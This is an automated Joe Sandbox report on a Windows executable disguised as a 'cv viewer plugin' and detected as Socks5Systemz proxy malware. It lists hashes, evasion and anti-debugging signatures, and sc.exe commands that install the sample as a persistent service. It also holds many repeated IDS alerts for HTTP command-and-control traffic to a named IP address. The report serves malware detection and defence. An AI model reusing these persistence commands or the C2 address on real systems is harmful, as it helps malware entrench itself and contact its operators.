Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cv viewer plugin 8.31.40.exe

Overview

General Information

Sample name:cv viewer plugin 8.31.40.exe
Analysis ID:1502272
MD5:cc497003e60667b5e3a13548ebb571fe
SHA1:91263b59d8f4929a39af589b6890ce8823c4244f
SHA256:f74ef29e192d79c8abaf8ba74fb4730895604ef65fd0ad5b3dc6feb98ed6642c
Tags:exe
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for sample
Sigma detected: Suspicious New Service Creation
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cmd.exe (PID: 7984 cmdline: cmd /c sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" >> C:\servicereg.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8056 cmdline: sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
  • cmd.exe (PID: 8100 cmdline: cmd /c sc start zuYSo >> C:\servicestart.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7268 cmdline: sc start zuYSo MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
  • cv viewer plugin 8.31.40.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" MD5: CC497003E60667B5E3A13548EBB571FE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000007.00000002.2645068946.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: cv viewer plugin 8.31.40.exe PID: 7320JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" , CommandLine: sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd /c sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" >> C:\servicereg.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7984, ParentProcessName: cmd.exe, ProcessCommandLine: sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" , ProcessId: 8056, ProcessName: sc.exe
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" , CommandLine: sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd /c sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" >> C:\servicereg.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7984, ParentProcessName: cmd.exe, ProcessCommandLine: sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" , ProcessId: 8056, ProcessName: sc.exe
        Timestamp:2024-08-31T22:13:21.067707+0200
        SID:2049467
        Severity:1
        Source Port:49720
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:38.485156+0200
        SID:2049467
        Severity:1
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:40.984852+0200
        SID:2049467
        Severity:1
        Source Port:49739
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:12.426483+0200
        SID:2049467
        Severity:1
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:19.630560+0200
        SID:2049467
        Severity:1
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:23.068462+0200
        SID:2049467
        Severity:1
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:40.178639+0200
        SID:2049467
        Severity:1
        Source Port:49738
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:47.651547+0200
        SID:2049467
        Severity:1
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:18.819460+0200
        SID:2049467
        Severity:1
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:00.588783+0200
        SID:2049467
        Severity:1
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:51.559222+0200
        SID:2049467
        Severity:1
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:39.346060+0200
        SID:2049467
        Severity:1
        Source Port:49737
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:58.050877+0200
        SID:2049467
        Severity:1
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:57.213414+0200
        SID:2049467
        Severity:1
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:01.396169+0200
        SID:2049467
        Severity:1
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:31.215466+0200
        SID:2049467
        Severity:1
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:45.496154+0200
        SID:2049467
        Severity:1
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:43.819808+0200
        SID:2049467
        Severity:1
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:28.427710+0200
        SID:2049467
        Severity:1
        Source Port:49728
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:25.567897+0200
        SID:2049467
        Severity:1
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:28.734686+0200
        SID:2049467
        Severity:1
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:34.049471+0200
        SID:2049467
        Severity:1
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:25.443187+0200
        SID:2049467
        Severity:1
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:36.033652+0200
        SID:2049467
        Severity:1
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:21.881623+0200
        SID:2049467
        Severity:1
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:30.488247+0200
        SID:2049467
        Severity:1
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:48.460032+0200
        SID:2049467
        Severity:1
        Source Port:49747
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:44.674814+0200
        SID:2049467
        Severity:1
        Source Port:49743
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:11.611904+0200
        SID:2049467
        Severity:1
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:54.739783+0200
        SID:2049467
        Severity:1
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:16.022052+0200
        SID:2049467
        Severity:1
        Source Port:49774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:34.861365+0200
        SID:2049467
        Severity:1
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:14.399313+0200
        SID:2049467
        Severity:1
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:21.317861+0200
        SID:2049467
        Severity:1
        Source Port:49780
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:15.206583+0200
        SID:2049467
        Severity:1
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:24.727641+0200
        SID:2049467
        Severity:1
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:27.579978+0200
        SID:2049467
        Severity:1
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:10.786477+0200
        SID:2049467
        Severity:1
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:29.555951+0200
        SID:2049467
        Severity:1
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:58.929152+0200
        SID:2049467
        Severity:1
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:22.966280+0200
        SID:2049467
        Severity:1
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:27.230646+0200
        SID:2049467
        Severity:1
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:30.374754+0200
        SID:2049467
        Severity:1
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:04.923998+0200
        SID:2049467
        Severity:1
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:08.667951+0200
        SID:2049467
        Severity:1
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:31.303698+0200
        SID:2049467
        Severity:1
        Source Port:49731
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:42.991483+0200
        SID:2049467
        Severity:1
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:29.245060+0200
        SID:2049467
        Severity:1
        Source Port:49729
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:07.832793+0200
        SID:2049467
        Severity:1
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:45.845487+0200
        SID:2049467
        Severity:1
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:33.355540+0200
        SID:2049467
        Severity:1
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:38.142044+0200
        SID:2049467
        Severity:1
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:42.164915+0200
        SID:2049467
        Severity:1
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:33.704540+0200
        SID:2049467
        Severity:1
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:18.002525+0200
        SID:2049467
        Severity:1
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:26.270947+0200
        SID:2049467
        Severity:1
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:14.047189+0200
        SID:2049467
        Severity:1
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:13.239729+0200
        SID:2049467
        Severity:1
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:52.748597+0200
        SID:2049467
        Severity:1
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:53.914207+0200
        SID:2049467
        Severity:1
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:49.658488+0200
        SID:2049467
        Severity:1
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:27.915380+0200
        SID:2049467
        Severity:1
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:46.818976+0200
        SID:2049467
        Severity:1
        Source Port:49745
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:17.196962+0200
        SID:2049467
        Severity:1
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:16.841168+0200
        SID:2049467
        Severity:1
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:03.032767+0200
        SID:2049467
        Severity:1
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:32.118123+0200
        SID:2049467
        Severity:1
        Source Port:49732
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:49.309231+0200
        SID:2049467
        Severity:1
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:50.353090+0200
        SID:2049467
        Severity:1
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:56.398645+0200
        SID:2049467
        Severity:1
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:09.020764+0200
        SID:2049467
        Severity:1
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:23.880712+0200
        SID:2049467
        Severity:1
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:50.001036+0200
        SID:2049467
        Severity:1
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:04.062935+0200
        SID:2049467
        Severity:1
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:55.569903+0200
        SID:2049467
        Severity:1
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:23.792402+0200
        SID:2049467
        Severity:1
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:02.219305+0200
        SID:2049467
        Severity:1
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:22.129953+0200
        SID:2049467
        Severity:1
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:20.472670+0200
        SID:2049467
        Severity:1
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:30.109888+0200
        SID:2049467
        Severity:1
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:10.434426+0200
        SID:2049467
        Severity:1
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:27.089047+0200
        SID:2049467
        Severity:1
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:22.718526+0200
        SID:2049467
        Severity:1
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:10.079726+0200
        SID:2049467
        Severity:1
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:51.204579+0200
        SID:2049467
        Severity:1
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:32.995984+0200
        SID:2049467
        Severity:1
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:59.758332+0200
        SID:2049467
        Severity:1
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:51.915084+0200
        SID:2049467
        Severity:1
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:14:24.633476+0200
        SID:2049467
        Severity:1
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:35.209076+0200
        SID:2049467
        Severity:1
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:41.332836+0200
        SID:2049467
        Severity:1
        Source Port:49739
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:26.406034+0200
        SID:2049467
        Severity:1
        Source Port:49726
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-31T22:13:53.098519+0200
        SID:2049467
        Severity:1
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: cv viewer plugin 8.31.40.exeVirustotal: Detection: 36%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: cv viewer plugin 8.31.40.exeJoe Sandbox ML: detected

        Compliance

        barindex
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeUnpacked PE file: 7.2.cv viewer plugin 8.31.40.exe.400000.0.unpack
        Source: cv viewer plugin 8.31.40.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49722 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49744 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49752 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49755 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49737 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49757 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49731 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49768 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49766 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49725 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49726 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49759 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49745 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49764 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49761 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49785 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49774 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49721 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49751 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49723 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49738 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49736 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49788 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49772 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49794 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49750 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49720 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49782 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49739 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49747 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49730 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49791 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49724 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49727 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49781 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49732 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49789 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49729 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49762 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49770 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49740 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49775 -> 185.196.8.214:80
